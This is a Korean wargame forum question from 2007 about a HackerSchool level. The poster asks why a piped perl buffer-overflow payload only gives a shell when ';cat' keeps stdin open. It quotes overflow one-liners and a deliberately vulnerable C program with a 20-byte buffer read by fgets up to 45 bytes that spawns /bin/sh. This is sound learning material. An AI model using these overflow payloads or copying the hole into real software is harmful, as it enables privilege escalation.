레벨 해킹

2844,

8/143

bugfixer2

명예의 전당에 오르신 분들도. 이거 정말 알고 넘어가셨나요?[질문]

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2378 [복사]

level12 넘겨보신분들은 알겠죠...
오버플로우 시킬 변수에 입력방식이 , 인자전달 이 아니라..
표준입력을 통해서 프로세서 실행후 따로 입력해줘야
하는 형식이면
$./attackme $RET
$./attackme `perl -e 'print "a"x ...'`

이런형식은 통하지 않습니다.. 인자로 전달해봣자 의미가 없는거겠죠.
이리저리 돌아다니면
$(perl -e 'print "A"x40,"\xef\xbe\xad\xde"';cat) | ./attackme

이 이법이 답이라는데요...
이걸 제대로 이해하고 넘어가는 사람은 굉장히 드물어 보입니다.
저또한 그당시는 대강 넘어갔지만(-_-;)
이리저리 글들을 찾아봐도 좋은 답변은 없군요..

파이프(|) 를 썻으니
ls | more
하면,
ls 라는 프로세스와 more 이라는 프로세스가 동시에 실행되고.
파이프 왼쪽 프로세스(ls) 의 표준출력 결과가 오른쪽 프로세스에 입력이
되겠죠..

물론 저도 그건 알고 있다만..

다음 레벨의 쉘을 얻기 위한 모든 준비는 다 끝난상황입니다.
제 말뜻은...

걍 예를 들죠뭐..

level14 문제 입니다. 조금 변형시켰습니다.
쉘을 띄우기전에... done 을 출력시키기로.

#include

main()
{  int crap;
   int check;
   char buf[20];
   fgets(buf,45,stdin);
   if(check == 0xdeadbeef)
    {
       printf("Done! \n");
       setreuid(3095,3095);
       system("/bin/sh");
    }
}
------------------------------EOF

fgets()를 통해서 buf 에 입력하네요..
그래서 전 생각했습니다.

(perl -e (생략),"\x00\x00\x00\x00"')|~/attackme

하면 되겠군.  이라 생각하고 시도해봣으나..

done 글자는 뜨지만,

쉘은 실행되지 않았습니다.

메모리에 입력은 잘됫단소린데...

왜 system("/bin/sh"); 이것만 실행이 안됫을까요...

왜 ;cat 을 넣어서 (perl -e (생략)\xde";cat)|./at

하면 쉘이 뜨는걸까요..

자세한 답변 부탁드립니다..  제가 어떤걸 공부해보면 알게되는걸까요;

Hit : 3542 Date : 2007/04/22 09:39